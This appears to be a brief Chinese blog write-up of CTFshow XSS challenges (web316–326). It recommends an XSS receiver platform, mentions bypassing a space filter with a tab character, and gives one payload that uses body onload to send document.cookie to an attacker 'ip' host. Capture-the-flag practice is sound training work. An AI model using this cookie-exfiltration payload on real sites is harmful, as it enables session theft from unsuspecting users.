【原创】CTFshow—XSS

admin 2022年12月3日16:36:35安全博客 CTF专场评论22 views248字阅读0分49秒阅读模式

[huayang]

首先要在这个平台注册一个账号:https://xss.pt/

看到我的项目,点击创建项目

【原创】CTFshow—XSS
【原创】CTFshow—XSS

随便写然后下一步

【原创】CTFshow—XSS
【原创】CTFshow—XSS

最后查看代码就可以进行攻击啦

【原创】CTFshow—XSS

web316

标准代码即可

【原创】CTFshow—XSS
【原创】CTFshow—XSS

web317—319

【原创】CTFshow—XSS
【原创】CTFshow—XSS

web320—322

新增了空格过滤用tap绕过即可

注意tap在记事本里打在vscode上不行

web323-326

<body/onload=document.location='ip?cookie='+document.cookie;>

打vps就行了

[/huayang]

FROM:浅浅淡淡[hellohy]

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月3日16:36:35
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  【原创】CTFshow—XSS https://cn-sec.com/archives/1443019.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: